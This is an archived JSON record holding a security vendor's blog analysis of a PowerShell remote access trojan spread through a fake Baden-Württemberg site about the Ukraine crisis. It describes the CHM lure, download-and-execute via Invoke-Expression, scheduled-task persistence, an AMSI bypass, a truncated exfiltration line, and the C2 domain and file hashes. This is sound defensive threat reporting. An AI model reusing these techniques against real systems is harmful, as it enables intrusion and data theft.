{
	"id": "9a605052-3625-4de2-ba7a-0c982dc4c5ba",
	"created_at": "2026-04-06T00:17:08.173088Z",
	"updated_at": "2026-04-10T13:11:39.459288Z",
	"deleted_at": null,
	"sha1_hash": "6c5771fa7956dd19a71a1a7e8cdc00986996a047",
	"title": "Custom PowerShell RAT targets Germans seeking information about the Ukraine crisis",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 877341,
	"plain_text": "Custom PowerShell RAT targets Germans seeking information\r\nabout the Ukraine crisis\r\nBy Mark Stockley\r\nPublished: 2022-05-15 · Archived: 2026-04-05 15:31:51 UTC\r\nThis blog post was authored by Hossein Jazi and Jérôme Segura\r\nPopulations around the world—and in Europe in particular—are following the crisis in Ukraine very closely, and\r\nwith events unfolding on a daily basis, people are hungry for information.\r\nAlthough all countries have reasons to be concerned, the situation is Germany is more complicated than most. It is\r\none of the few European countries to have received criticism for its attitude to the Ukraine-Russia conflict, as it\r\nstruggles to end its reliance on Russian energy, and Moscow recently imposed sanctions on Gazprom Germania,\r\nfurther increasing economic tensions.\r\nThis week our analysts discovered a new campaign that plays on these concerns by trying to lure Germans with a\r\npromise of updates on the current threat situation in Ukraine. The downloaded document is in fact decoy for a\r\nRemote Access Trojan (RAT) capable of stealing data and executing other malicious commands on a victim’s\r\ncomputer.\r\nDecoy site lures victims with Ukraine situation\r\nThreat actors registered an expired German domain name at collaboration-bw[.]de that was formally used as a\r\ncollaboration platform to develop new ideas for the Baden-Württemberg state.\r\nArticle continues below this ad.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 1 of 9\n\nThe threat actors used the domain to host a website that looked like the official Baden-Württemberg website,\r\nbaden-wuerttemberg.de.\r\nWith this copycat, the attackers created the perfect placeholder for the lure they wanted their victims to download:\r\nA file tantalising called 2022-Q2-Bedrohungslage-Ukraine (threat situation in Ukraine for Q2), offered via a\r\nprominent blue download button.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 2 of 9\n\nAn English translation of the page reads:\r\nImportant, current threat situation regarding the Ukraine crisisOn this website you will always find\r\nFile analysis\r\nThe archive file called 2022-Q2-Bedrohungslage-Ukraine contains a file named\r\n2022-Q2-Bedrohungslage-Ukraine.chm\r\n. The CHM format is Microsoft’s HTML help file format, which consists of a number of compiled HTML files.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 3 of 9\n\nVictims will get a fake error message when they open up that file, while PowerShell quietly runs a Base64\r\ncommand.\r\nAfter de-obfuscating the command we can see it is designed to execute a script downloaded from the fake Baden-Württemberg website, using Invoke-Expression (IEX).\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 4 of 9\n\nThe downloaded script creates a folder called SecuriyHealthService in the current user directory and drops two\r\nfiles into it:\r\nMonitorHealth.cmd\r\nand a script called Status.txt . The\r\n.cmd\r\nfile is very simple and just executes Status.txt through PowerShell.\r\nFinally, the downloaded script makes MonitorHealth.cmd persistent by creating a scheduled task that will execute\r\nit each day at a specific time.\r\nPowerShell RAT (Status.txt)\r\nStatus.txt is a RAT written in PowerShell (This Rat is a modified version of an HTTP Reverse Shell that is\r\navailable on Github). It starts its activities by collecting some information about the victim’s computer, such as the\r\ncurrent username and working directory, and the computer’s hostname. It also builds a unique id for the victim,\r\nthe\r\nclientid\r\n.\r\nThis data is exfiltrated as a JSON data structure sent to the server via a POST request:\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 5 of 9\n\n$json='{ \"type\": \"newclient\", \"result\": \"\", \"pwd\": \"' + $pwd_b64 + '\", \"cuser\": \"' + $cuser + '\", \"ho\r\nHowever, before executing this requests the script will first bypass the Windows Antimalware Scan Interface\r\n(AMSI) using an AES-encrypted function called bypass . It is decrypted using a generated key and IV before\r\nexecution.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 6 of 9\n\nThis RAT has the following capabilities:\r\nDownload(type: D0WNl04D): Download files from server\r\nUpload(type: UPL04D): Upload file to the server\r\nLoadPS1(type: L04DPS1): Load and execute a PowerShell script\r\nCommand(type: C0MM4ND): Execute a specific command\r\nGerman command and control server\r\nThe attack was thoughtfully carried out—even ensuring that the stolen data was sent to a German domain name,\r\nkleinm[.]de, to avoid suspicion.\r\nIt is not easy to attribute this activity to a specific actor, and there are no solid indicators to support attribution.\r\nBased on motivation alone, we hypothesise that a Russian threat actor could be targeting German users, but\r\nwithout clear connections in infrastructure or similarities to known TTPs, such attribution is weak.\r\nThe Malwarebytes Threat Intelligence team continues to monitor attacks taking advantage of the warin Ukraine\r\nwhile ensuring our customers are protected.\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 7 of 9\n\nIndicators of Compromise (IOCs)\r\nPhishing site\r\ncollaboration-bw[.]de/bedrohung-ukr.html\r\nLure\r\n2022-Q2-Bedrohungslage-Ukraine.zip\r\n2430f68285120686233569e51e2147914dc87f82c7dbdf07fe0c34dbb1aca77c\r\n2022-Q2-Bedrohungslage-Ukraine.chm\r\n80bad7e0d5a5d2782674bb8334dcca03534aa831c37aebb5962da1cd1bec4130\r\nStatus.txt\r\na5d8beaa832832576ca97809be4eee9441eb6907752a7e1f9a390b29bbb9fe1f\r\nMonitorHealth.cmd\r\nfc71522a4125ca4bdc5e5deca4a6498e7f2da4408614c2e1284c3ae8c083a5fd\r\nC2\r\nkleinm[.]de\r\nMITRE ATT\u0026CK\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 8 of 9\n\nTactic ID Name Description\r\nExecution T1059\r\nCommand and\r\nScripting\r\nInterpreter\r\nStarts cmd.exe to run hh.exe\r\nExecutes PowerShell script to\r\ndownload and execute a script\r\nPersistence T1053 Scheduled Task/Job\r\nExecutes task scheduler to add\r\nMonitorHealth.cmd as a daily\r\ntask\r\nDefense\r\nevasion\r\nT1222\r\nFile and Directory\r\nPermissions\r\nModification\r\nUses attrib.exe to hide\r\nSecuriyHealthService folder\r\nSource: https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukra\r\nine-crisis/\r\nhttps://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/\r\nPage 9 of 9",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://blog.malwarebytes.com/threat-intelligence/2022/05/custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis/"
	],
	"report_names": [
		"custom-powershell-rat-targets-germans-seeking-information-about-the-ukraine-crisis"
	],
	"threat_actors": [],
	"ts_created_at": 1775434628,
	"ts_updated_at": 1775826699,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.pdf",
		"text": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.txt",
		"img": "https://archive.orkl.eu/6c5771fa7956dd19a71a1a7e8cdc00986996a047.jpg"
	}
}